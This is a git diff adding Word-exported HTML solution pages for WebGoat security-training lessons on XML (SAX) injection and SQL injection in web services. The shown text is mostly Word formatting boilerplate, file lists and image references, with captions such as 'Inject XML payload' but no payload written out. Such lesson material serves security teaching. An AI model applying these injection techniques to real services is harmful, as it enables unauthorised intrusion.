+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>115</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Inject XML payload</p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_43"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/WsSAXInjection_files/image010.jpg" v:shapes="Picture_x0020_43"><![endif]></span></p>
+
+<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
+<!--[if supportFields]><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>116</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/filelist.xml
new file mode 100644
index 000000000..56559fd6d
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/filelist.xml
@@ -0,0 +1,16 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../WsSAXInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image010.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image001.png b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image001.png
new file mode 100644
index 000000000..ba76d14d9
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image002.jpg b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image002.jpg
new file mode 100644
index 000000000..24692deda
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image003.png b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image003.png
new file mode 100644
index 000000000..be045e27f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image004.jpg b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image004.jpg
new file mode 100644
index 000000000..c6698ffba
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image005.png b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image005.png
new file mode 100644
index 000000000..84e5ff852
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image006.jpg b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image006.jpg
new file mode 100644
index 000000000..40dcd7832
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image007.png b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image007.png
new file mode 100644
index 000000000..94b298db1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image008.jpg b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image008.jpg
new file mode 100644
index 000000000..9faeaaac1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image009.png b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image009.png
new file mode 100644
index 000000000..acdfd2592
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image010.jpg b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image010.jpg
new file mode 100644
index 000000000..ad7400d38
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/image010.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSAXInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSAXInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection.html b/main/project/WebContent/lesson_solutions/WsSqlInjection.html
new file mode 100644
index 000000000..80c381862
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WsSqlInjection.html
@@ -0,0 +1,765 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/WsSqlInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WsSqlInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>42</o:TotalTime>
+  <o:Created>2007-07-11T14:10:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:21:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>262</o:Words>
+  <o:Characters>1497</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>12</o:Lines>
+  <o:Paragraphs>3</o:Paragraphs>
+  <o:CharactersWithSpaces>1756</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/WsSqlInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WsSqlInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:Wingdings;
+	panose-1:5 0 0 0 0 0 0 0 0 0;
+	mso-font-charset:2;
+	mso-generic-font-family:auto;
+	mso-font-pitch:variable;
+	mso-font-signature:0 268435456 0 0 -2147483648 0;}
+@font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Cambria;
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073741899 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
